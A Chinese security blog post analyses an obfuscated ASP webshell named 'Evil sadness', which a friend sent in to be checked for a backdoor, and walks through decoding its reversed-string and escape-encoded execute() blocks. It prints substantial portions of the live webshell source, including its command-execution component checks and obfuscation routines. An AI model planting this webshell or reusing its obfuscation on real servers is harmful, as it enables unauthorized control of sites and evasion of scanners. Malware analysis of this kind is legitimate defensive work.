• 欢迎访问金刀客博客!
  • 2019,春节快乐!

Evil sadness(邪恶悲伤)webshell大解密及后门全解析

原创天空 admin 11160次浏览 已收录 11个评论

之所以称之为大解密,那是因为这个shell的加密方式比较丰富,同时功能也比较强大,另外后门那也是非常的隐蔽,本地抓包那是抓不到滴。
这个是一个朋友传给我,让帮忙看看有没有后门,初步查看还真没看到哪里有后门,发现几个地方可疑,但是仔细一看,也是一个死后门,没什么用,直到后面才发现朴素的外表下面其实“别有洞天”。
先上图

端庄的“蒙娜丽莎”,让人顿生怜悯之心

功能比较强大
下面解密,这个shell一样最后是经过vbscript.vbcode加密,启用此类解密器解密之。

<%@ LANGUAGE = VBScript %><% Server.ScriptTimeout=999999999 UserPass="111" '密码 mNametitle="Evil sadness" '名字 Copyright="Evil sadness" '版权 SItEuRl="HTTP://ZZZ.Hk” ‘网站地址
Font=”300pt” ‘登陆图案大小
pic=”Ÿ” ‘登陆图案代码编号,具体代码请查看 http://zzz.hk/webdings.htm
BodyColor=”pink” ‘整体页面背景颜色,具体代码请查看 http://zzz.hk/color.htm
FontColor=”#000″ ‘普通文字颜色
LinkColor=”#50616d” ‘链接颜色
BorderColor=”#d8d8d8″ ‘文件边框颜色
LinkOverBJ=”#000000″ ‘鼠标移到链接上面背景的颜色
LinkOverFont=”red” ‘鼠标移到链接上面文字的颜色
FormColorBj=”#dddddd” ‘输入框架背景颜色
FormColorBorder=”#222000″ ‘输入框架边框颜色
‘**********************************************
‘本程序只用于安全检测服务器漏洞,
‘得用于非法用途,否则后果自负!
‘By 丫丫
‘2009.09.07
‘**********************************************
Response.Buffer =true
On Error Resume Next
sub ShowErr()
If Err Then
RRS”

” & Err.Description & “


Err.Clear:Response.Flush
End If
end sub
Sub RRS(str)
response.write(str)
End Sub
Function RePath(S)
RePath=Replace(S,”\”,”\\”)
End Function
Function RRePath(S)
RRePath=Replace(S,”\\”,”\”)
End Function
URL=Request.ServerVariables(“URL”)
ServerIP=Request.ServerVariables(“LOCAL_ADDR”)
Action=Request(“Action”)
RootPath=Server.MapPath(“.”)
WWWRoot=Server.MapPath(“/”)
FolderPath=Request(“FolderPath”)
FName=Request(“FName”)
BackUrl=”

返回

Function AAAA(objstr):objstr=Replace(objstr,”Θ”,””””):For i=1 To Len(objstr):If Mid(objstr, i, 1)<>“Ω” Then:NewStr=Mid(objstr,i,1)&NewStr:Else:NewStr=vbCrlf&NewStr:End If:Next:AAAA=NewStr:End Function
RRS”
RRS”“&mNametitle&” – “&ServerIP&”
RRS”


dim a,b
a=” RRS%22%3Cscript%20language%3Djavascript%3Efunction%20killErrors%28%29%7Breturn%20true%3B%7Dwindow.onerror%3DkillErrors%3B%22%0D%0ARRS%22function%20yesok%28%29%7Bif%20%28confirm%28%22%22%u4F60%u786E%u8BA4%u8981%u6267%u884C%u6B64%u64CD%u4F5C%u5417%uFF1F%22%22%29%29return%20true%3Belse%20return%20false%3B%7D%22%0D%0ARRS%22function%20ShowFolder%28Folder%29%7Btop.addrform.FolderPath.value%20%3D%20Folder%3Btop.addrform.submit%28%29%3B%7D%22%0D%0ARRS%22function%20FullForm%28FName%2CFAction%29%7Btop.hideform.FName.value%20%3D%20FName%3Bif%28FAction%3D%3D%22%22CopyFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u590D_%u5236%u5230%u76EE%u6807%u6587_%u4EF6%u7684_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165_%u79FB_%u52A8%u5230%u76EE%u6807%u6587%u4EF6_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22CopyFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22NewFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CreateMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u4E0D%u80FD%u540C%u540D%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CompactMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u538B%u7F29%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u6587%u4EF6%u662F%u5426%u5B58%u5728%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%7BDName%20%3D%20%22%22Other%22%22%3B%7Dif%28DName%21%3Dnull%29%7Btop.hideform.Action.value%20%3D%20FAction%3Btop.hideform.submit%28%29%3B%7Delse%7Btop.hideform.FName.value%20%3D%20%22%22%22%22%3B%7D%7D%22″:b=replace(a,”@@@”,”Rinimama”):c=split(b,”Rinimama”):for i=0 to ubound(c):temp=temp+c(i):next:execute(unescape(temp)):RRS”function DbCheck(){if(DbForm.DbStr.value == “”””){alert(“”请你先连接数据库””);FullDbStr(0);return false;}return true;}”:RRS”function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""Select * FROM [TableName] Where ID<100"";Str[5] = ""Insert INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""Delete FROM [TableName] Where ID=100"";Str[7] = ""Update [TableName] SET USER=\'username\' Where ID=100"";Str[8] = ""Create TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""Drop TABLE [TableName]"";Str[10]= ""Alter TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""Alter TABLE [TableName] Drop COLUMN PASS"";Str[12]= ""当只显示一条数据时即可显示字段的全部字节,可用条件控制查询实现.\n超过一条数据只显示字段的前五十个字节。"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""

请确认己连接数据库再输入SQL操作命令语句。
“”;}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}”
RRS”function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""请你检查数据库连接串是否正确!"");return false;}if(str.length<10){alert(""请你检查SQL语句是否正确!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}":RRS"“:rrs “
Dim ObT(13,2):ObT(0,0) = “Scripting.FileSystemObject”:ObT(0,2) = “文 件 操 作 组 件”:ObT(1,0) = “wscript.shell”:ObT(1,2) = “命 令 行 执 行 组 件”:ObT(2,0) = “ADOX.Catalog”:ObT(2,2) = “ACCESS 建 库 组 件”:ObT(3,0) = “JRO.JetEngine”:ObT(3,2) = “ACCESS 压 缩 组 件”:ObT(4,0) = “Scripting.Dictionary”:ObT(4,2) = “数据流 上 传 辅助 组件”:ObT(5,0) = “Adodb.connection”:ObT(5,2) = “数据库 连接 组件”:ObT(6,0) = “Adodb.Stream”:ObT(6,2) = “数据流 上传 组件”:ObT(7,0) = “SoftArtisans.FileUp”:ObT(7,2) = “SA-FileUp 文件 上传 组件”:ObT(8,0) = “LyfUpload.UploadFile”:ObT(8,2) = “刘云峰 文件 上传 组件”:ObT(9,0) = “Persits.Upload.1”:ObT(9,2) = “ASPUpload 文件 上传 组件”:ObT(10,0) = “JMail.SmtpMail”:ObT(10,2) = “JMail 邮件 收发 组件”:ObT(11,0) = “CDONTS.NewMail”:ObT(11,2) = “虚拟SMTP 发信 组件”:ObT(12,0) = “SmtpMail.SmtpMail.1”:ObT(12,2) = “SmtpMail 发信 组件”:ObT(13,0) = “Microsoft.XMLHTTP”:ObT(13,2) = “数据 传输 组件”:For i=0 To 13:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=” √”:Else:IsObj=” ●”:Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>“” then:Session(“FolderPath”)=RRePath(FolderPath):End If:If Session(“FolderPath”)=”” Then:FolderPath=RootPath:Session(“FolderPath”)=FolderPath:End if:execute AAAA(“noitcnuF dnEΩ tluser = retniotxehΩ txeNΩ j + tluser = tluserΩ txeNΩ 61 * j = jΩ i – )nirts(neL oT 1 = k roFΩ fI dnEΩ ))1 ,i ,nirts(diM(tnIC = jΩ nehT Θ0Θ => )1 ,i ,nirts(diM dnA Θ9Θ =< )1 ,i ,nirts(diM fIΩ fI dnEΩ 01 = jΩ nehT ΘAΘ = )1 ,i ,nirts(diM rO ΘaΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 11 = jΩ nehT ΘBΘ = )1 ,i ,nirts(diM rO ΘbΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 21 = jΩ nehT ΘCΘ = )1 ,i ,nirts(diM rO ΘcΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 31 = jΩ nehT ΘDΘ = )1 ,i ,nirts(diM rO ΘdΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 41 = jΩ nehT ΘEΘ = )1 ,i ,nirts(diM rO ΘeΘ = )1 ,i ,nirts(diM fIΩ fI dnEΩ 51 = jΩ nehT ΘFΘ= )1 ,i ,nirts(diM rO ΘfΘ = )1 ,i ,nirts(diM fIΩ )nirts(neL oT 1 = i roFΩ 0 = tluserΩ tluser ,k ,j ,i miDΩ )nirts(retniotxeh noitcnuFΩnoitcnuF dnEΩfI dnEΩΘ!daeR t'naC !rorrEΘ etirw.esnopseRΩ eslEΩ))))0(yarrAtroP(xeH(rtSC&)))1(yarrAtroP(xeH(rtSC(retniotxeh etirw.esnopseRΩ Θ:Θ& troP etirw.esnopseRΩ nehT )yarrAtroP(yarrAsI fIΩ) troP & htaPnimdaR(DAERGER.HSW=yarrAtroPΩΘ>rb<>rb<Θ etirw.esnopseRΩfI dnEΩΘ!daeR t'naC !rorrEΘ etirw.esnopserΩeslEΩjborts etirw.esnopserΩtxeNΩ fI dnEΩ))i(yarrAretemaraP(xeH & jbOrts = jbOrtsΩeslEΩ)))i(yarrAretemaraP(xeH(rtSC&Θ0Θ & jbOrts = jbOrtsΩ nehT 1=)))i(yarrAretemaraP(xeh( neL fIΩ)yarrAretemaraP(dnuoBU oT 0 = i roFΩnehT )yarrAretemaraP(yarrAsI fIΩΘ:Θ&retemaraP etirw.esnopseRΩ)htaPt00R( dneSlmXΩ) retemaraP & htaPnimdaR(DAERGER.HSW=yarrAretemaraPΩΘ>rb<>rbrb<Θetirw.esnopseRΩΘtroPΘ ...................................................................

按照习惯,先解密使用加密最多的部分,
可以看到在这里都是这种模式

execute AAAA(“noitcnuF dnEΩ tluser = retniotxehΩ txeNΩ j + tluser = tluserΩ txeNΩ 61 * j = jΩ i – )nirts(neL oT 1 = k roFΩ fI dnEΩ ))1 ,i ,nirts(diM(tnIC = jΩ nehT Θ0Θ => )1 ,i ,nirts(diM dnA Θ9Θ =< )1 ,i ,nirts(diM fIΩ fI dnEΩ 01 = jΩ nehT ΘAΘ = )1 ,i ,nirts(diM rO ΘaΘ")

解密函数为
Function AAAA(objstr):objstr=Replace(objstr,”Θ”,””””):For i=1 To Len(objstr):If Mid(objstr, i, 1)<>“Ω” Then:NewStr=Mid(objstr,i,1)&NewStr:Else:NewStr=vbCrlf&NewStr:End If:Next:AAAA=NewStr:End Function
典型的十三解密函数,这个好办,但是这里有一个不同之处是它不是采用的十三的那种执行方式,没有字符赋值给变量,而是直接执行。
这个使用自己写的WEBSHELL Decoder & Encoder快速搞定

现在可以看到另外一处加密也是比较多的
解密函数

Function MorfiCoder(Code):MorfiCoder=Replace(Replace(StrReverse(Code),”\*\”,””””),”/*/”,vbCrlf):End Function

执行方式
execute MorfiCoder(“/*/noitcnuF dnE/*/fi dne/*/\*”)
同上面的方法,解密之
解密到现在,才仔细检查文件,我们可以发现还有3个地方时解密的。首先在文件的开头有一个加密的地方。
代码为

a=” RRS%22%3Cscript%20language%3Djavascript%3Efunction%20killErrors%28%29%7Breturn%20true%3B%7Dwindow.onerror%3DkillErrors%3B%22%0D%0ARRS%22function%20yesok%28%29%7Bif%20%28confirm%28%22%22%u4F60%u786E%u8BA4%u8981%u6267%u884C%u6B64%u64CD%u4F5C%u5417%uFF1F%22%22%29%29return%20true%3Belse%20return%20false%3B%7D%22%0D%0ARRS%22function%20ShowFolder%28Folder%29%7Btop.addrform.FolderPath.value%20%3D%20Folder%3Btop.addrform.submit%28%29%3B%7D%22%0D%0ARRS%22function%20FullForm%28FName%2CFAction%29%7Btop.hideform.FName.value%20%3D%20FName%3Bif%28FAction%3D%3D%22%22CopyFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u590D_%u5236%u5230%u76EE%u6807%u6587_%u4EF6%u7684_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFile%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165_%u79FB_%u52A8%u5230%u76EE%u6807%u6587%u4EF6_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22CopyFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22MoveFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u79FB%u52A8%u5230%u76EE%u6807%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20+%3D%20%22%22%7C%7C%7C%7C%22%22+DName%3B%7Delse%20if%28FAction%3D%3D%22%22NewFolder%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684%u6587%u4EF6%u5939_%u5168_%u540D_%u79F0%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CreateMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u65B0%u5EFA%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u4E0D%u80FD%u540C%u540D%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%20if%28FAction%3D%3D%22%22CompactMdb%22%22%29%7BDName%20%3D%20prompt%28%22%22%u8BF7%u4F60%u8F93%u5165%u8981%u538B%u7F29%u7684Mdb%u6587%u4EF6_%u5168_%u540D_%u79F0%2C%u6CE8%u610F%u6587%u4EF6%u662F%u5426%u5B58%u5728%uFF01%22%22%2CFName%29%3Btop.hideform.FName.value%20%3D%20DName%3B%7Delse%7BDName%20%3D%20%22%22Other%22%22%3B%7Dif%28DName%21%3Dnull%29%7Btop.hideform.Action.value%20%3D%20FAction%3Btop.hideform.submit%28%29%3B%7Delse%7Btop.hideform.FName.value%20%3D%20%22%22%22%22%3B%7D%7D%22″
b=replace(a,”@@@”,”Rinimama”)
c=split(b,”Rinimama”)
for i=0 to ubound(c)
temp=temp+c(i)
next
execute(unescape(temp))

将escape加密的字符进行了拆分,执行时再重新组合起来。解密将execute用Server.HTMLEncode方法或者其它保存的方法都可以解决。
得到明码。

RRS”